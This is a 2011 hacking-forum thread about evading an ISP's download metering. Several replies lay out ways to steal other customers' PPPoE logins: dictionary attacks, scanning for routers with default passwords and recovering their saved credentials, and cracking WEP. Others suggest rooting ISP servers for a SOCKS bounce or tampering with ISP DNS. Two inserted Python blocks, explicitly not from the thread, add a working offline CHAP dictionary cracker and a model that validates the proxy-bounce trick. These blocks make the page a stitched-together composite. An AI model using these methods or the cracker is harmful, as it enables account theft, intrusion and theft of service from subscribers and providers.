
Tricking Your Internet Provider


17 replies to this topic

#1 Powermaniac7

Powermaniac7

    mad 1337

  • Members
  • 138 posts
  • Country:
  • Gender:Male

Posted 08 December 2011 - 09:56 PM

Hi all,

I just came up with an idea which someone else might find helpful, but I don't know how to do it. The question is: would it be possible to trick your internet provider into thinking something you're downloading is from their server, thus allowing it to be unmetered? Keep in mind this is a 'theoretical' question >.> <.< >.>.

So, considering I'm not currently on an unlimited internet usage deal: they have servers that, if hosting the data I want, I can download from without it counting towards my download/upload limit.

Any thoughts or ideas would be appreciated.

I'm looking at changing internet providers soon anyway, because the current contract has ended.

Powermaniac

#2 Afterm4th

Afterm4th

    SUPR3M3 31337 Mack Daddy P1MP

  • Members
  • 399 posts
  • Country:
  • Gender:Male
  • Location:way up north eh

Posted 08 December 2011 - 11:22 PM

Who is your current ISP?

#3 Powermaniac7

Powermaniac7

    mad 1337

  • Members
  • 138 posts
  • Country:
  • Gender:Male

Posted 09 December 2011 - 03:39 AM

Telstra Bigpond...I can provide a link if necessary.

#4 Afterm4th

Afterm4th

    SUPR3M3 31337 Mack Daddy P1MP

  • Members
  • 399 posts
  • Country:
  • Gender:Male
  • Location:way up north eh

Posted 10 December 2011 - 07:26 PM

Is it cable or ADSL?

#5 Powermaniac7

Powermaniac7

    mad 1337

  • Members
  • 138 posts
  • Country:
  • Gender:Male

Posted 12 December 2011 - 05:41 AM

ADSL...

#6 tekio

tekio

    5(R1P7 |<1DD13

  • Binrev Financier
  • 1,068 posts
  • Gender:Male
  • Location:The Blue Nowhere

Posted 12 December 2011 - 02:16 PM

1) If an ISP is using PPPoE, one could make a little application to perform a dictionary attack against other PPPoE accounts. A person would just need to find out what their standard is for naming PPPoE accounts, i.e. usually it's an email address, the first part of the email address before the "@", or the customer's name. Then they'd need to figure out the provider's password policy for issuing PPPoE passwords. That's easy if a person already has a PPPoE account... If unsure how it was formulated, one could just call and say they need to change the PPPoE password. If the ISP lets customers choose whatever one they'd like, the attack will probably be successful. If the ISP issues a PPPoE password like "Md576!df76&45wKL0p$", it's probably not too likely this will work.

2) A person could get IP address ranges from the provider. Scan the address range looking for SoHo routers. Find said router with a default password. Go into the router. Use an app that will recover a password behind asterisks. Boom! Someone's PPPoE account/password has been compromised. It would take about 10 minutes to write a Perl script to automate the majority of this process.

3) Find out how they determine where a server is located. They'll either use IP ranges or a DNS whitelist, most likely.

If using IP ranges, one of the ISP's servers could be used as a SOCKS server (assuming someone can get root) to bounce connections from virtually any protocol, using something like SocksCap on the client.

If using DNS and their DNS server can be compromised, it would be possible to make bogus DNS records, but that would fuck it up for anyone else trying to get to that address using the compromised DNS. So you could just use OpenDNS or Google DNS.

If any box on the LAN where the DNS servers reside is vulnerable from the outside, there is a lot of DNS tampering that can be attempted as well.

Anything I mentioned will send a person straight to the federal hoosegow in most any country. So this post was purely for educational discussion of a scientific nature, and in response to a hypothetical question. Don't try this at home! :D

Edited by tekio, 12 December 2011 - 02:25 PM.


#7 nyphonejacks

nyphonejacks

    Dangerous free thinker

  • Members
  • 787 posts
  • Gender:Male
  • Location:718

Posted 12 December 2011 - 04:38 PM

How exactly would all of this work? Verizon DSL uses open PPPoE for most accounts that I have come across in the last few years, meaning that the username and password do not mean anything: you can put anything as the username and password and you would still connect. Since it is a direct line between you and the central office, there is little reason to authenticate with a password...

I have a theory on how to exploit this, but it would probably be too expensive and bulky for most applications.
My thought would be to get the dial tone before it goes to the customer and connect it to a DSL modem, but then you would need to find a way to convert the LAN signal back to a DSL signal to send to the customer so that their internet still worked. There would also have to be a filter on the dial tone to prevent the real DSL signal from affecting the generated DSL signal, so that you would be able to send the dial tone back into the house as well...

#8 tekio

tekio

    5(R1P7 |<1DD13

  • Binrev Financier
  • 1,068 posts
  • Gender:Male
  • Location:The Blue Nowhere

Posted 12 December 2011 - 06:44 PM


The last ISP I worked at used PPPoE and CHAP for authentication against a RADIUS server for DSL customers' Internet access.
https://www.google.c...iw=1920&bih=946

AT&T, I know, was one company, at least where I live, where PPPoE was authenticated. https://www.google.c...iw=1920&bih=946

#9 tekio

tekio

    5(R1P7 |<1DD13

  • Binrev Financier
  • 1,068 posts
  • Gender:Male
  • Location:The Blue Nowhere

Posted 12 December 2011 - 06:46 PM


The last ISP I worked at used PPPoE and CHAP for authentication against a RADIUS server for DSL customers' Internet access.

AT&T, I know, was one company, at least where I live, where PPPoE was authenticated. https://www.google.c..._KYSq2QX8yfHdCA

#10 Powermaniac7

Powermaniac7

    mad 1337

  • Members
  • 138 posts
  • Country:
  • Gender:Male

Posted 13 December 2011 - 12:54 AM

For some reason all those posts went right over my head, and I didn't understand a word of it...

Rereads all posts again...

#11 Afterm4th

Afterm4th

    SUPR3M3 31337 Mack Daddy P1MP

  • Members
  • 399 posts
  • Country:
  • Gender:Male
  • Location:way up north eh

Posted 13 December 2011 - 06:06 PM

*cough* http://www.sbhacker.net *cough cough*

#12 wwwd40

wwwd40

    DDP Fan club member

  • Members
  • 53 posts
  • Gender:Male

Posted 14 December 2011 - 05:05 AM

In my experience, PPPoA services in the UK authenticate in the same way as described, the key being the PPP bit. That said, I've seen services provided by BT that require no username or password to be configured and use a different L2 encapsulation (these are mainly legacy services, from what I can tell). Remember it's normally going to be the domain part of the username that will drop you into the correct L2 tunnel towards your ISP, which then uses the username part for the ISP RADIUS authentication side of things.

That said, I can't help with the OP's question beyond what's already been suggested. I would advise against brute forcing ISP accounts from your own home, as it's a good way to get a cease and desist or get kicked off your ISP; it's a pretty noisy way of doing things.
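The posts above describe PPP over a DSL line authenticating with CHAP against a RADIUS server, with the domain part of the login selecting the L2 tunnel (the ISP) and the user part selecting the account, and contrast that with "open" PPPoE that accepts any credentials. The following is an added example, not code from the thread or from any ISP: it implements CHAP-MD5 as specified in RFC 1994 (response = MD5(identifier || secret || challenge)), a tiny per-realm user store standing in for the RADIUS back end, and the offline dictionary attack against one captured challenge/response pair that tekio's post #6 alludes to. The realm names, logins, secrets and wordlist are all constructed for the example; the one strong provider-issued secret is the sample string from post #6.

```python
import hashlib
import os
import secrets

# Constructed example (not the thread's code). Assumed: one small user store per
# realm, keyed by the domain part of the PPP login, standing in for the ISP's RADIUS
# server. CHAP needs the cleartext secret on the server side, which is why a
# captured challenge/response can be guessed offline against a wordlist.
REALMS = {
    "isp-a.example": {"alice": "Md576!df76&45wKL0p$"},   # provider-issued random secret
    "isp-b.example": {"bob": "password1"},                # customer-chosen weak secret
}

# Hypothetical wordlist; a real one would be far larger.
WORDLIST = ["123456", "password", "password1", "letmein", "qwerty"]


def split_login(login):
    """Split 'user@realm' into (user, realm); the realm picks the L2 tunnel/ISP."""
    user, sep, realm = login.rpartition("@")
    if not sep or not user or not realm:
        raise ValueError("login must look like user@realm")
    return user, realm


def chap_response(identifier, secret, challenge):
    """RFC 1994 CHAP with MD5: MD5(Identifier || Secret || Challenge)."""
    if not 0 <= identifier <= 255:
        raise ValueError("CHAP identifier is one octet")
    return hashlib.md5(bytes([identifier]) + secret.encode() + challenge).digest()


def verify(login, identifier, challenge, response, realms=REALMS):
    """Server side: look the account up in its realm and check the response.
    Unknown realm, unknown user and wrong response all fail the same way."""
    user, realm = split_login(login)
    secret = realms.get(realm, {}).get(user)
    if secret is None:
        return False
    expected = chap_response(identifier, secret, challenge)
    return secrets.compare_digest(expected, response)


def open_pppoe_verify(login, identifier, challenge, response):
    """The 'open PPPoE' case from the thread: any login and any response is accepted,
    so the line itself is the only thing identifying the subscriber."""
    return True


def dictionary_attack(identifier, challenge, response, wordlist):
    """Offline guess against one captured challenge/response; returns the secret or None.
    Nothing is sent to the server, so no lockout or logging on the RADIUS side."""
    for guess in wordlist:
        if chap_response(identifier, guess, challenge) == response:
            return guess
    return None


def demo():
    """Authenticate both constructed accounts, then try the captured pairs offline.
    Returns {login: recovered secret or None}."""
    challenge = os.urandom(16)
    ident = 0x2A
    recovered = {}
    for login in ("bob@isp-b.example", "alice@isp-a.example"):
        user, realm = split_login(login)
        response = chap_response(ident, REALMS[realm][user], challenge)
        assert verify(login, ident, challenge, response)
        recovered[login] = dictionary_attack(ident, challenge, response, WORDLIST)
    return recovered


if __name__ == "__main__":
    print(demo())
```

The point of the two accounts is the one tekio makes: CHAP itself is fine, but with a customer-chosen secret the captured exchange falls to a short wordlist, while the provider-issued random secret does not. The wordlist runs offline, which is why wwwd40's warning about noisy online brute forcing does not apply to it; the noisy part is capturing the exchange in the first place.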

#13 Powermaniac7

Powermaniac7

    mad 1337

  • Members
  • 138 posts
  • Country:
  • Gender:Male

Posted 15 December 2011 - 07:29 AM

Thanks for the link, Afterm4th; I shall join that forum if it is trustworthy, which I assume it is for you to provide a link to it...

Anyway, I'm not planning on brute forcing; maybe I was misunderstood...

I was asking if there was a way to have a link you are downloading from be proxied as their own server, thus being unmetered...? Because of their Unmetered Usage deal, if you download from their servers it doesn't affect your download usage; thus if I can pose a download I am doing as being from their server, I then get it for free =D... Just thought it might be possible, knowing that there are so many possibilities with the internet and technology these days...

Edit: Considering I didn't understand any of what was said, I'm not sure whether my question was understood or not...

Edited by Powermaniac7, 15 December 2011 - 07:35 AM.


#14 Afterm4th

Afterm4th

    SUPR3M3 31337 Mack Daddy P1MP

  • Members
  • 399 posts
  • Country:
  • Gender:Male
  • Location:way up north eh

Posted 15 December 2011 - 02:37 PM

Yes, the site is legit. If you were to hypothetically steal from an ISP, the people at that site would be the best way to go. Hypothetically.

#15 jfalcon

jfalcon

    Hakker addict

  • Agents of the Revolution
  • 589 posts
  • Location:Living within the ether

Posted 15 December 2011 - 04:46 PM

It sounds like packet accounting is done on the border gateway routers based on IP.

To answer your question, though: could you spoof your traffic to look like it came from one of the "free" servers? No, as it would break the routing of packets. The BGRs know the truth anyway.
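Two posts in this thread make claims about how metering by IP range behaves: tekio's point 3 in post #6 (if the exemption is an IP range, a SOCKS bounce through one of the ISP's own servers makes the whole transfer look unmetered) and jfalcon's answer just above (spoofing the source address does not work, because the replies are routed to the address you spoofed, not to you). The following is an added example, not code from the thread or from any ISP's accounting system: a toy border-router meter that attributes bytes to one subscriber by the remote end of each flow, exempts one "content server" prefix, and applies a source-address check on the subscriber port. The prefixes and hosts are constructed from the RFC 5737 documentation ranges and assume nothing about Telstra or any other provider.

```python
import ipaddress
from collections import defaultdict

# Constructed example (not the thread's code). Assumed model: the ISP's border
# router meters each subscriber by the *remote* address of a flow and exempts the
# prefix its own content servers live in. All addresses are documentation ranges.
UNMETERED = [ipaddress.ip_network("192.0.2.0/24")]      # hypothetical ISP content servers
CUSTOMER = ipaddress.ip_address("198.51.100.10")        # hypothetical subscriber address
BOUNCE_HOST = "192.0.2.7"                               # an ISP server inside the exempt range
INTERNET_HOST = "203.0.113.5"                           # the file the subscriber really wants


def is_unmetered(addr):
    """True when the remote end of a flow sits inside an exempt prefix."""
    a = ipaddress.ip_address(addr)
    return any(a in net for net in UNMETERED)


def meter(flows, customer=CUSTOMER):
    """Account a list of (ingress, src, dst, nbytes) records for one subscriber.

    ingress is "access" (arrived on the subscriber's line) or "core" (arrived from
    the Internet side). Returns a dict with whichever of these keys were touched:
      metered   - counted against the subscriber's quota
      unmetered - to/from an exempt prefix, not counted
      dropped   - arrived on the subscriber port with a source that is not the
                  subscriber (the anti-spoofing / uRPF check)
      not_ours  - arrived from the core but addressed to someone else, so this
                  subscriber never receives it
    """
    totals = defaultdict(int)
    for ingress, src, dst, nbytes in flows:
        s, d = ipaddress.ip_address(src), ipaddress.ip_address(dst)
        if ingress == "access":
            if s != customer:
                totals["dropped"] += nbytes
                continue
            remote = d
        elif ingress == "core":
            if d != customer:
                totals["not_ours"] += nbytes
                continue
            remote = s
        else:
            raise ValueError("ingress must be 'access' or 'core'")
        totals["unmetered" if is_unmetered(remote) else "metered"] += nbytes
    return dict(totals)


def scenarios():
    """Three constructed transfers of the same 100 kB file, seen at the meter."""
    me = str(CUSTOMER)
    # 1. Plain download from an Internet host: request up, data down.
    direct = [("access", me, INTERNET_HOST, 500),
              ("core", INTERNET_HOST, me, 100_000)]
    # 2. Same file fetched through a SOCKS proxy on the exempt ISP server: the
    #    subscriber only ever talks to BOUNCE_HOST. The proxy's own leg to
    #    INTERNET_HOST never crosses this subscriber's meter at all.
    bounced = [("access", me, BOUNCE_HOST, 500),
               ("core", BOUNCE_HOST, me, 100_000)]
    # 3. Spoofing: the subscriber sends the request with BOUNCE_HOST as its source.
    #    The request is dropped on the access port, and even if it got through the
    #    reply is addressed to BOUNCE_HOST, so it is routed there and never arrives.
    spoofed = [("access", BOUNCE_HOST, INTERNET_HOST, 500),
               ("core", INTERNET_HOST, BOUNCE_HOST, 100_000)]
    return {"direct": meter(direct), "bounced": meter(bounced), "spoofed": meter(spoofed)}


if __name__ == "__main__":
    for name, result in scenarios().items():
        print(f"{name:8s} {result}")
```

The model makes the two claims concrete: a bounce through an exempt host is invisible to an IP-range meter because the subscriber's flows genuinely terminate on the exempt address, while a spoofed source only ever produces dropped requests and replies delivered to somebody else. The caveat that goes with it is tekio's own "assuming someone can get root": the trick needs a host inside the exempt prefix under the attacker's control, and the proxy's second leg is fully visible on that server and in the ISP's core, so it is not the subscriber's meter that would catch it.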

#16 nyphonejacks

nyphonejacks

    Dangerous free thinker

  • Members
  • 787 posts
  • Gender:Male
  • Location:718

Posted 15 December 2011 - 08:32 PM

Curious about:
1. Do they provide you with any free hosting?
2. If they do, do uploads/downloads to your free hosting space get metered, or is that unlimited for you to transfer to/from?
3. A question probably for someone more knowledgeable to provide input on: could you run a proxy server on your hosted service and get free transfers that way? I know you can set up a proxy to run on Google App Engine on Google's servers; I have one. I think I got the instructions from the Lifehacker site or something.

#17 stormaes

stormaes

    Will I break 10 posts?

  • Members
  • 6 posts
  • Gender:Male

Posted 19 December 2011 - 10:15 PM

Theoretically, if you wanted to do things the hard way for this, you could try running around cracking some WEP keys and grabbing the passwords from the router (most people who would use WEP use the default router password). This would be the easier / more time-consuming / lower-profile way of gaining ISP details.

#18 nyphonejacks

nyphonejacks

    Dangerous free thinker

  • Members
  • 787 posts
  • Gender:Male
  • Location:718

Posted 20 December 2011 - 10:59 PM

It was not my intention at all to crack WEP keys. It was more a curiosity about whether this vulnerability existed, and whether it could be created in a controlled environment, or as a pen test of a network that you have permission to crack...




BinRev is hosted by the great people at Lunarpages!